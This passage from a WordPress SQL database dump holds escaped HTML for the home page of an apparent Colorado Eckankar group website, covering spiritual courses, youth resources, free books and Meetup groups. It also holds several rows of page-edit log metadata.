48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231576,39186,'_message_key','post_updated'),(231577,39186,'_user_id','2'),(231578,39186,'_user_login','S8zhaBda'),(231579,39186,'_user_email','nada@zipnadanot.org'),(231580,39186,'_server_remote_addr','76.130.120.x'),(231581,39186,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(231582,39187,'post_id','7160'),(231583,39187,'post_type','page'),(231584,39187,'post_title','Home'),(231585,39187,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\"></div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" 